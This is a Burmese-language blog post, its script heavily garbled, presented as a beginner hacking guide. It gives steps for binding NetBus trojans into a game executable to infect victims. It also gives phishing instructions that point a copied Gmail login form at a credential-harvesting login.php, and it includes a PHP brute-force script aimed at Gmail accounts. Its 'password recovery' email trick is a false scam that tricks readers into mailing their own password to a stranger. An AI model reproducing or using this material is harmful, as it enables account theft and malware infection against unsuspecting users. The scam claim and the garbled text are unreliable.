Sunday, January 12, 2020
Tuesday, April 2, 2019
✒️α‘ေျααံ Hacking αα္းααာ α ာα‘ုα္✒️
April 02, 2019
2 comments
✒️{αာαိαာ}
Introduction: αα္αာαိုαာαာαဲ ႏွα့္ αြ်ႏ္ုα္၏ α‘ျαα္
α‘αိုα္း (α) : αိုα‘α္ေαာα‘αα္α‘ျαα္းα်ား
α‘αိုα္း (α) : Hacker αိုα၏ αွ်ိဳααွα္α်α္α်ား
……….Intro
……….Trojan Horse αုေααေαာ virus α‘ေαΎαာα္း
…………αα္αာေαα‘ြ αုံးျαဳေαာ αွ်ိဳααွα္ α‘αာα်ား
………..Port Scanning
………..SubSeven
……….NetBus
α‘αိုα္း (α) : Gmail Password Hack αα္း
…………..Phishing α‘ေαΎαာα္း Intro
α‘αိုα္း (α) : Phishing αα္းαα္းαိုα‘αံုးျαဳ၍ gmail password ေαာα္αα္း
α‘αိုα္း (α ) : Windows αိုαα္ေαႊαα္း αိုαီαုα္α α်ား
………. Registry αို့αα္ေαာα္ေαႊေႏွာα္ျαα္း
……… Folder αို software ααံုးαဲ lock α်αα္း ႏွα့္ Funny Command ေαးαα္း
……… Cmd Dos Command αα္းαα္းαါးαါး
……… Folder Background αို software ααံုးαဲ αံုαွαွေαးαα့္αα္း
……… website ေαြααဲα IP αုိα်α္α်α္းαိα်α္αα္αိုαα္
αα္αာαိုαာαာαဲ ??? αြ်ႏ္ုα္၏α‘ျαα္ ။
Hacking ααာαα္αိုαα္ αα္αူαိုααေαာ ααာααုα္။ α‘αံုးα် αα္းααာα်ားαို ေα့αာေαြααွိျαီး
α‘ားαα္းα်α္αို αွာေαြႏိုα္ေαာ ααာျαα ္αα္။ Online ေαααြα္ Hacking αဲααα္αα္ေαာ
α ာα‘ုα္α်ားα ြာαိုေαြααူးျαီး Hacking ႏွα့္αα္αα္ေαာ web site α်ားαဲ ေαααြα္ေααါျαီ။ Vulnerability
ေαါα္းα်ားα ြာαို hacker αုေααေαာ αူα ုα်ားα αွာေαြေαြααွိျαီး web site ေαါα္းα်ားα ြာαြα္ αα္αားαΎααါαα္။ α‘ဲαီ
αα္းααာαα္ေαြαို α‘αံုးျαဳ αွီαို ေααဲ့αူေαြα‘α်ားααီးαွိαါαα္။ αါေαြα αα္αာေαြαားαိုαဲ့
ေαးαြα္းေαးႏိုα္αါαα္။
Tool user ေαြαါ၊ professional hacker αα ္ေαာα္αိုαာ αါααီα‘αα္းαံျαီး αြα္α်ဴαာ αα္းααာ
αိုαူးαြα္αဲ့ αူαα ္ေαာα္αဲαIT αိုα္းαိုα္αာေα်ာ့αြα္αို αွာေαြαႏိုα္ျαα္းျαα ္αါαα္။ White, black, gray αိုαေαααဲ့
hacker αံုးα်ိဳးαြဲαားαါαα္။ αဲα black αေαာ့ αα္αူေαြေαါ့။ α‘α်ားα ုα gray ေαြαါ။
αါαို α်ေαာ္ေαးαားαဲ့ α ာα‘ုα္αေαာ၊ αα္ျαီး hacker αα ္ေαာα္ျαα ္ႏိုα္αါ့ααား
αိုαေαးႏိုα္α αာα‘ေαΎαာα္းαွိαါαα္။ α်ေαာ္αိုα္αိုα္ေαာα္αွ αα္αာααုα္αာα်။ :D ။ α်ေαာ္αိαာေαးေααြ ို
share αုα္ေαးα်α္αဲ့αα္αြα္α်α္αို α‘αိααားαာαါ။
α‘αိုα္း (α) αိုα‘α္ေαာ α‘αα္α‘ျαα္းα်ား
hacking αုα္αα့္ေααာαြα္ αα ္α₯ီးαα ္ေαာα္αုα္ျαα္းαα္ α‘ α်ားႏွα့္
αူေαါα္းျαီး αုα္αွ်α္ αုိျαီး α‘ α်ဳိးαွိαα္။ αုိαေαΎαာα့္ Ethical hacking αြα္ Hacker
α်ားα ုαြဲαျαီး TEAM αα ္αုα‘ ေαျαα့္ αုα္ေαာα္ααα္။ ၎αုိααα္ α‘ α်ိα္αုိα္း αိαိ
αုိα္αြα္αေαာ System α‘ား αုိα‘ α္α်α္α်ားαုိαွာေαြျαα္αα္ααα္။
αုိα္αုိα္ျαα္းα်ဳိးα ုံ αွိαα့္α‘ αြα္ α‘ ားαုံးαုိαိαွိαα္αွာαျαα ္ႏူိα္ေα။αိαိhacking
α‘ αြဲααြα္ αုα္αုိα္ေαာαူα်ားαα္ ေα‘ာα္ေαာ္ျααါ ααာαα္α်ားαုိ αα ္α₯ီး
αα ္ေαာα္ျαα္း α‘ ေαα‘ α်ာαα္ေျαာα္αα္αုိα‘α္αα္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ααာαα္α်ား α‘ားαုံးαုိ αိαွိαα္ ααုိေα။ αုိαေαာ္ general knowledge
αိαွိααα္။ αိαိ Hacker α‘αြဲααြα္ αူαα ္ေαာα္α ီ ααာαα ္αုα ီαုိ
ေαေαα်ာα်ာαα္ေျαာα္αα္αိုα‘α္αα္။
Hacker αα ္ေαာα္ေα‘ာα္ျαα္α ြာျαဳαုα္ႏုိα္αα္α‘αြα္αုိα‘α္α်α္α်ားα ြာαွိαα္။
αိαိ αα္ေαာα္αုိေαာ ေααာ၏ data α‘ျαα့္α‘α ုံαုိαိαွိေα‘ာα္ α‘αα္αုံးျαဳαုα္ααα္။
IP address
αိαိαα္ေαာα္ααα့္ Computer ၏ address
Hostname
αိαိ αα္ေαာα္ααα့္ Computer ၏ αာαα္
Software
၎ Computer αြα္α‘αုံးျαဳေαာ Software α်ား
Firewall rules
Network ၏ αုံျαဳံေαးα‘αြα္α‘αုံးျαဳαားαα္α်ား
Phone Numbers
αုα္းαံαါα္
Employee names
α‘αုα္ααားα်ား ၏ α‘ေαΎαာα္းα‘αာα်ား
αိαိαုိααိαုိေαာ α‘α်α္α်ားα ြာαုိ Internet αွ α်ားα ြာα‘αူα‘αီေαးႏုိα္αα္။
αα ္hacking αုα္αုိေαာ ေααာ၏ data αα% αုိ internet αွαွာႏုိα္αါαα္။
၎၏ company ႏွα့္αα္αα္ေαာ αုα္းαံαါα္ ၊ IP address ၊ Firewall ၊ α‘αုα္ααား
α₯ီးေα ၊ company α αα္αα္ေαာα္ေαာေαα ၊ company ၏ αုိα္αွα္ α‘αα္α်ား ၊
company α်ိα္αα္αားေαာ αျαားNetwork α်ား၊ company ၏αုα္ αုα္α်ားα αα့္
ααα္းα‘α်α္α‘αα္α်ားαုိα‘α်ဳိးαွိαွိ α‘αုံးα်ααα္ျαα ္αα္။
hacking ျαဳαုα္αα္α‘αြα္α‘αုံးျαဳေαာ Tools α်ား
1. Google (α‘ေαΎαာα္းα‘αာα်ားα ြာαုိ αွာႏုိα္αα္။)
2. Google Earth (Network α်ိα္αα္ျαα္းα်ားαုိ αΎαα့္αႈαα္)
3. Nmap (IP addres α်ားαုိαΎαα့္αႈαα္)
4. John The Ripper (Password α်ားαုိေα်ာ္ႏုိα္αα္)
5. Lan Guard (αိαိ၏ Network αုိ ေα ာα့္αΎαα့္αα္)
6. Pwdump 6 (Password α်ားαုိα်ိα္းαα္)
7. Firebug (website α်ားαွျαα္αΏαီး server αဲαိုααα္αα္)
8. Java ( Mysql αုိျαα္αα္αα္)
9. putty (αျαား Computer αဲαုိα αα္ေαာα္αα္)
၎ αုိαျαα့္α αα္α α္းαα္ α‘αုံးျαဳαΎαျαီး αိαိαုိα၏ α₯ာα္αα္α₯ာα္ေαြးα‘α
αα္αα္α‘ေαာα္α‘αα္ေαာ္αΎαα့္αα့္αα္။Tools α်ား၏ α‘αုα္αုα္αုံαုိ ေαα်ာ αား
αα္αွαာ α‘αုံးျαဳႏုိα္αα္ျαα ္αα္။Tools α်ား၏ α‘ားαα္းα်α္α်ားαုိ αိαားααα္ ျαα ္
αα္။ Tools α်ားαုိαုံးαွ်α္ ၎αုိα၏ αုံးα ြဲαုံ α‘ေαΎαာα္းαုိ ေαα်ာαα္αΎαα့္ααα္။
α‘αိုα္း (α) Hacker αိုα၏ αွ်ိဳααွα္α်α္α်ား…
Intro
Trojan Horse
Hacking αဲαα‘αိα ααားαံαိုαေျαာႏိုα္αာαေαာ့ Trojan αိုαဲ့ virus ေαΎαာα့္αါ။
α‘α္αာαα္αိုα္ေαြαွာ ေαြαααα္αα္ ။ USB Stick ေαြαို virus scan αုα္αိုα္αα္
ေαာ္ေαာ္α်ားα်ားေαြαααဲ့ virus αα ္α်ိဳးေα။ Trojan, Trojan αဲα αူαိေαာ္ေαာ္α်ားαါαα္။
α်ေαာ္ေα့αာαိုααိααာေαာ့ αြα္α်ဴαာαဲα α‘α်α္α‘αα္ေαြ၊ password ေαြα‘αိုးαံααာαာ α‘ဲαီ
Trojan ေαြေαΎαာα့္αိုα αံααျαα ္αα္αိုαα္ ααွားႏိုα္αါαူး။ Trojan αိုαာ program ေαးေαးေαးαါ။
α‘ဲαီ program ေαးα αြα္α်ဴαာαα ္αု αဲαွာ αα္ေαာα္ေααာαူαာ hacker αီαိုα αα္းαြα္α်ဴαာ၏
information α်ားαို ααα္းေαးႏိုα္ေαာ Program αα ္αုαါ။ αα္း Trojan ျαα့္ αြα္α်ဴαာα်ားαို
αိα္းα်ဳα္ႏိုα္αါαα္။
Trojan α်ား၏ α‘α်ားα‘ားျαα့္ αုα္ေαာα္ႏိုα္ေαာ α‘α ြα္းααိၱα်ားαို ေα‘ာα္αြα္ေααျααားαါαα္။
.CD-Rom drive α်ားαို α‘αြα့္၊ α‘αိα္ control αုα္ႏိုα္ျαα္း
.αα္၏ αြα္α်ဴαာαွ screenshot αို capture αုα္ႏိုα္ျαα္း
.αα္၏ password α်ား ( Windows, MSN, Gmail, Yahoo,….α‘α αျαα့္) αို hacker αီαိုα ααα္းαိုαေαးႏိုα္ျαα္း
.αα္၏ hard disk αဲαွ file α်ားαို αိုααို αူးαူႏိုα္ျαα္း၊ delete αုα္ႏိုα္ျαα္း
.Keyboard ႏွα့္ mouse αို Disable αုα္ႏိုα္ျαα္း……α‘α αျαα့္
Popular ျαα ္ေαေαာ Trojan α်ား
-NetBus
-SubSeven
NetBus Trojan αွာ α‘ျαား Trojan α်ားαဲ့αိုα α‘ေαးααီးαဲ့ α‘α ိα္α‘αိုα္း α αိုα္း αွိαါαα္။ NetBus Server.exe αα္
Patch.exe αα္αို αဲ့ exe file α αု αါαα္αါαα္။ NetBus Server αို αα္၏ αြα္α်ဴαာαဲαိုα α‘αα္αံုး install
αုα္αα္αိုαါαα္။ Patch file αို αα္ hack α်α္ေαာ αြα္α်ဴαာαဲαိုα αြα္းႏိုα္αα္ α‘αိα αိုα‘α္αါαα္။
α₯ααာ- αα္ hack α်α္ေαာ αြα္α်ဴαာ αိုα္αွα္၏ information αိုα‘αα္αံုးα ံုα α္းαα့္αါαα္။ αα္αα္
αိα္ေαြ αူαα္α်α္းαို αွ်α္αို၍ α‘αα္ေျααါαα္။ ေαွးα₯ီးα ြာ αူ ၏ email αိုα αိုα၍ run
αိုα္းျαα္းα‘ားျαα့္αဲ αႏိုα္αါαα္။ αါαွααုα္ αူαα‘ား αိα္းαα္ေαာα္ေαးααိုαိုျαα့္ αα္းαိα္းαဲαြα္
Patch file αို αြα္းေαးαိုα္αါ။ chess.exe file αိုαါα ိုα။ αα္း exe file αဲαိုα Patch αြα္းαိုα္αါ။
ResHacker software ျαα့္ αα္αီးႏိုα္αါαα္။ αိုαေαာα္ αα္αα္αီးαိုα္ေαာ chess.exe αာ
αာαα္α‘αိုα္းαါαဲ။ αာαွαေျαာα္းαဲαြားαါαူး။ α‘ဲαီ αာαို install αုα္αိုα္αွ်α္ αိα္းαာ αူα
orginal α‘αိုα္းαါαဲ။ αာαွ ျαႆαာαေαးႏိုα္αါαူး။ αα္ေαးαိုα္αဲ့ chess αဲα patch file
ေαးα αα္ hack α်α္ေαာ αြα္α်ဴαာαဲαြα္ ေααာαူျαီးαားျαα ္αါαα္။ α‘ဲαီ file ααဲ hidden
ျαα ္ေααာαါ။ α‘ဲαါαို α‘αα္ေျααြားαါαိα့္αα္။ α hack α်αာေαါ့။…..:D ။
αα္αာေαြ α‘αံုးျαဳေαာ αွ်ိဳααွα္ α‘αာα်ား
(α) Port Scanners
Port Scanner αိုαာαာα ဲ
Port Scanning αဲα α‘αိα αα္αြα္α်α္αေαာ့ opening port ေαြαို αွာαိုαျαα ္αါαα္။ Hacker αα ္ေαာα္
α‘αြα္ α‘ေျααံα်αဲ့ αα္းαα ္αုαါ။ opening port ေαြαိုαိαွ hack αိုααြα္αွာαိုး….။Hacker α‘ေααဲα server ေαα
αွာαုα္ေααဲ့ service ေαြαို αΎαα့္ျαα္းα‘ားျαα့္ vulnerability ေαြαို αွာႏိုα္αိုα α‘αြα့္α‘αα္းαိုα်ားαာαွာαါ။
αာαα္ααီးαဲ့ nmap port scan tool αိုေαါα္းαုα္α်αိုα link αါ > http://nmap.org/download.html <
Online ေαααွာα‘ျαားport scanner tool ေαာα္းေαာα္းေαြα‘α်ားααီးαွိαါေαးαα္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning αို α α်ိဳးαုα္ႏိုα္αါαα္။ ααααα ္αုα Single IP port αြα့္αα္α‘αြα္ႏွα့္ αုαိααα ္αုαို Range IP
Port αြα့္αα္ျαα ္αါαα္။ IP αိုαာα ေαွαααာααူျαီး α‘ေαာα္α αံαါα္αေျαာα္းαဲαြားႏိုα္αါαα္။
α₯ααာ 192.168.1.2 , 192.168.1.3 α‘α αျαα့္ေαါ့။ αုα္းαံαါα္α‘αိုα္းαါαဲ (530-xxx) α‘α αျαα့္……….
Range IP αိုαာα ေαာ့ ( 555-0000 to 555-9999) α‘αိ αΎαားαဲα αα္αα့္ααα္းααို ျαα ္ႏိုα္αါαα္။
Port Scanner αိုαာ αီαုိα်ိဳးေαါ့
(α) Trojan
Trojan α‘ေαΎαာα္းαေαာ့ Hacking αွာ ααါ αျαα ္αိုေαြαααွာαါ။ αာαိုααဲαိုေαာ့ Trojan ေαြα
αα္αာေαြαဲααα္α ြဲ virus αα ္α်ိဳးαိုααိုααါ။ Trojan ေαါα္း αα ္αာေα်ာ္αီးαါαိွαါαα္။ α‘ဲαီαဲα
α ံုαြဲ αေαာαိုျαα ္ေαေαာ Trojan α‘ေαΎαာα္း α₯ααာ α‘ေαႏွα့္ေααျααားαါαα္။ α‘ဲαီ Trojan ျαα့္
α်ေαာ္ α‘αုαα္αွိေαႊေααα္ေα…..
Sub Seven
Sub Seven Trojan αွာ αုα္ေαာα္ႏိုα္αဲ့ α ြα္းαα္ α‘α်ားα‘ျαားαွိαါαα္။ αα္း Trojan αာ α်ေαာ္ေαြααူးααွ်
Trojan αααေα်ာ္ေαာα္αဲα α‘ေαာα္းαံုး αိုα αူααါαα္။ αα္းαဲααုα္ေαာα္ႏိုα္αဲ့α ြα္းαα္ေαြαို
ေα‘ာα္αွာေααျααားαါαα္။
SubSeven αိုαာ αီαိုα်ိဳးαါ
αုα္ေαာα္ႏိုα္αွဳα်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-E-Mail
-Real name
-Country code
-Local Phone
-Zip code………….α‘α αျαα့္ေαါ့…….. α‘ျαားαုα္ေαာα္ႏိုα္αႈα်ားα ြာαွိαါေαးαα္….။
NetBus
Net Bus αိုαာαေαာ့ αိုးα‘αα္αုα္းα αံုးαဲ့αဲ့ Trojan α‘ေαာα္းαα ္α်ိဳးαါ။ αါေααဲ့ ေαာ္ေαာ္
α်ားα်ားαေαာ့ αα္းαို αုα်ိα္αိ αံုးα ြဲαွ်α္αွိαΎααါαα္။ Net Bus αဲαေαႊြααာαဲေαာ္ေαာ္α‘αα္ေျααါαα္။
α α္းαံုးαΎαα့္ေαါ့……..။ αံုးαα္းαို α‘ေαααြα္ ေααျααΏαီးαါαΏαီ။
NetBus αို α€αိုαေαြαျαα္ααါαα္။
NetBus ၏ αုα္ေαာα္ႏိုα္α ြα္းα်ားαို α‘αα္αြα္ ေααျααားαါαα္။ α‘ေαးα ိα္ေαာ့ αေααျαေαာ့αါ။
α‘αိုα္း (α) Gmail Password Hack αα္း
Gmail Password αို Hack αာαြα္ αာေαြαိုα‘α္ααα္း ???
Hack αα္းေαါα္းα်ားα ြာαွိαါαα္။ ေαွးα₯ီးα ြာ αိုးαိုးαွα္းαွα္းျαα့္ Hack ေαာαα္းαα္းαို α‘αα္ေααျααါαα္။ αြα္αဲ့αဲ့
αααα αုႏွα ္ေαာα္αုα္းα javascript αα္းျαα့္α်ေαာ္ αံုးαΎαα့္αူးαါαα္။ α‘αုေαာα္αိုα္းαα္αံုးαΎαα့္αာ
ααေαာ့αါαူး၊ Google α admin ေαြααဲ ααံုးေαြαွααုα္αာ။ αူαိုα security ေαြαို
ααααျαα္ျαα္ျαα္αα္ေα။ α်ေαာ္αိုααα္α‘α်ားααီးαွ α‘α်ားααီးαိုαα္αာေαါ့။ ααု αα္းα ေαာ့ Google αဲα
security ေαြαို ျαα္ေα်ာ္αိုαααဲ့ javascript α‘αα ္αα ္αုαါ။ α်ေαာ္α€ αα္းαို ႏိုα္αံျαား Hacking
α ာα‘ုα္αဲαေαု αာαာျαα္αားαာαါ။ αါααာαါαα္ αα္းαα္းαါးαါးေαာα္ αα္ေαႊαΎαα့္αΎαေαါ့
αုα္αα္း
αα ္αα့္ျαα္းαီေααျααားαါαα္။
α‘αα့္(α) αα္၏αိုα္αိုα္ Gmail account ျαα့္ Gmail αဲαိုα Login αα္αါ။
αွα္α်α္ ( passwrdserver2@gmail.com αိုαα‘αα္αံုး add αားαါ၊ add
αားျαီးα‘αα္းαံုးαα္ေαါα္း αα ျαα့္αွ α€αုα္αα္းαိုαα αα္αုα္ႏိုα္αα္ျαα ္αα္)
α‘αα့္(α) Login αα္ျαီးျαီးျαα္း compose mail αုα္αါ။To: αိုαဲ့ေααာαွာ passwrdserver2@gmail.com
αိုαေαးαါ။(passwrdserver2@gmail.com αိုαာ Google server αွ username ႏွα့္ password α်ား αို
αွα္αားေαာ ေααာαိုα mail αိုααိုα္ျαα္းျαα ္αါαα္။ Automatic server αေα αα့္αို mail
αα ္ေαာα္ျαα္αိုααါαိα့္αα္။ ေα ာα့္ေααါ)
α‘αα့္(α) Subject: αိုαဲ့ ေααာαွာ ‘’PASSWORD RECOVERY’’ αိုαΏαီး αိαိα်α်ေαးαါ။
α ာαံုးေαါα္းααွားαါေα ႏွα့္။ α‘ေαးααီးαါαα္။
α‘αα့္(α) mail αိုα αα္ေαးႏိုα္αါျαီ။ αααα ာေαΎαာα္းαွာ αα္ hack α်α္ေαာ αူ၏ account αိုေαးαါ။
α‘αα့္(α ) αုαိαα ာေαΎαာα္းαွာေαာ့ αα္ααုαα္αွိα‘αံုးျαဳေαေαာ gmail account αိုေαးαါ။
α‘αα့္(α) ααိαေျαာα္α ာေαΎαာα္းαွာေαာ့ αα္၏ gmail password αိုေαးαါ java script ျαα့္ users
administrator server security αိုျαα္ေα်ာ္αာαြα္ verify αုα္αα္αα္၏ password αိုαဲαိုαါαα္။
α‘αα့္(α) ေαာα္αံုးα‘αα့္αဲα ααα့္αိုα‘ေαးα‘ααီးαံုးα‘αα့္αါαဲα်ာ..။ ေα‘ာα္αွာ α်ေαာ္ေααျααားαဲ့
code αိုေαေαα်ာα်ာ ေαာ္αီαူးαါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
α‘ားαံုး ready ျαα ္αါα send αိုαααါျαီ။ send αိုα္αါေαာ့။
α₯ααာ- αα္၏ αိုα္αိုα္ gmail account α myname@gmail.com αိုαါα ိုα
αα္၏ password α 123456 αိုααွα္αိုα္αါ။ αα္ hack α်α္ေαာ αူ၏
Gmail account αေαာ့ test@gmail.com αိုααားαိုα္αါ။α်ေαာ္ေα‘ာα္αွ ေααျααားαဲ့α‘αိုα္း
mail αα ္ေαာα္ေαးαါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: αိုေααာα်ားαြα္ αာαွ αေαးαါႏွα့္
Subject: ‘’PASSWORD RECOVERY’’
Text box αဲαြα္ေαးαα္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg αိုαေαααဲ့ mail αα ္ေαာα္ αα့္αီαို α αာαီα‘αြα္း automatic ျαα္αိုααါαိα့္αα္။ αို mail
αဲαြα္ αα္ hack αိုေαာαူ၏ information α်ားα‘αုα္αါαာαွာျαα ္αါαα္။ α α္းαΎαα့္α်αါ။ α်ေαာ့္ mail
αိုေαာ့ α hack αဲαေαာ္ password αို α‘αံုး αα ေαးαားαိုααါ…..αီး……αီး…..
Phishing
Phishing ႏွα့္ αα္αα္ျαီး
α်ေαာ္ Phishing αိုαဲ့ α‘ေαΎαာα္းαို αိαေαာα္ αα္းαα္းေျαာα်α္αါαα္။ ααα္ေαာ့ α‘ဲαီ Phishing
αိုαာ αိα္αဲ့ αα္းေαးαα ္αုαါ။ αူα်ားαဲα Gmail account αဲျαα ္ျαα ္၊ Yahoo account αဲျαα ္ျαα ္၊ mediafire account
αဲျαα ္ျαα ္ αα္αα့္ α‘ေαာα့္ αိုααို αိα္αာαာ password αူαိုααေαာαα္းαα္းျαα ္αါαα္။ Phisher αုိαာ
αြα္α်ဴαာ α‘αုံးαΏαဳαူαုိααဲα Data Information ေαြαုိααူαα္ αΏαဳαုα္αား α‘αုα‘ေαာα္α ာα်α္ႏွာ (a fake login
page) αα ္αုαာαွ်α္ αΏαα ္αါαα္။ fake login page ေαြα Computer user ေαြαဲα user name and password
ေαြαုိ αုိα္αα ္αုαေα၊ αါαွααုα္ ေαးα္αုိ Direct αုိααဲα αα္းαα္းαုံးαားαာα်ားαါαα္... αα ္α်ဳိαေαြα
α်α္α်α္αΏαα္ααΏαα္ααုံးαΎααါαα္..
αααူ ဲαα‘αုα္αုα္αုံα αိုးαွα္းαါαα္။ free host, free domain, code script ( αိαိ hack α်α္αဲ့ site αဲα code αါ )
ျαီးαα္ setting α‘αα္းαα္ေαး αα္ျαα္ျαီးαα္ Hack αိုαααါျαီ။
php enabled αားαဲα web hosting αα ္αုαုိαါαα္... Phishing Attacker ေαြαေαာ့ free ααဲα webhosting αွာ
account αα ္αုαြဲααΏαီးαုံးေα့αွိαါαα္...
αိαိα‘αုံးαΏαဳαဲα mail services, αုိαΎααါαုိ Gmail
https://mail.google.com αုိαဲαြားαြား, https://www.gmail.com αဲ αΏαα ္αΏαα ္ αြα့္αာ Ctrl + U αုိαααုα္ Menu bar
αွာ view>Page Source αိုαြားαာ α‘αုα္αုံးαုိ Copy αူးαΏαီး text editor or web editor .. example :
Dreamwaver αဲααုိα Editor αဲαုိ α‘αုα္αုံး paste αုα္αူαုိα္αါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
αုိ αိαိαα္αီးαားαဲα login page αွ data ေαြαုိ ααူႏုိα္ေα‘ာα္ αိα္းαα္းαားαဲα login script file
αုိαα္းαြα္ေαးααါαα္..
α₯ααာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php αုိαာα fake login page α User αုိα္αα့္αုိα္ေαာ user name and password αုိααူαာαါ)
α‘ဲααုိ αΏαα္αα္αူαေαြαုα္αΏαီး free hosting αα ္αုαွာαα္...
user αုိ αα္းα်ဳိးα ုံαဲα αိαိαဲα ေαာα္ေαΏαာα္αဲαုိ α‘ေαာα္αြα္းαΎααာαါ..........
αါα Fake Login Page ေαြαဲα ααူαာαါ။ ααα္αα္း fake login ေαြα αီေαာα္αဲα ααုံေαာα္αါαူး... Phishing
Hacker ေαြα αူαုိααဲα phisher ေαြαုိ αα္းαα္းα်ဳိးα ုံαဲα αα္းαုိααဲα Victim αုံαΎαα္ေαာα္ေα‘ာα္
ေαြးေαာα္αΏαားေαာα္း၊ αΏαီးေαာ့ attacker αα္αီးαားαဲα page αုိေαာα္αα္ေαာα္αွ αာαာα္ user
αα ္ေαာα္α‘αြα္ αုံးα (αုံးα) ααိေα‘ာα္ address bar / mouse down function
ေαြαα‘α ေαါα...α αα္..α αα္
αα္း Fake Loign α‘ားαြားေαာα္ α α္းαα္αα္... α α္းαα္αုံα α္းαα္αါ... αိαိαဲα gmail user name and password
αုိေαာα္αုိαေαာα္ αုိα္ααα့္αုိα္αဲα.... αုံးα αာαα္ααူ။
α‘αိုα္း (α) Phishing αα္းαα္းαိုα‘αံုးျαဳ၍ gmail password ေαာα္αα္း
free host ααုαုαွာ αီαုα္ေαြαို αြα္းျαီး αါαွααုα္ αိုα့္α α္αို local host α‘ေααဲα setting α်ျαီး
α်ီေαးαိုေαာα္αိုαααါျαီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
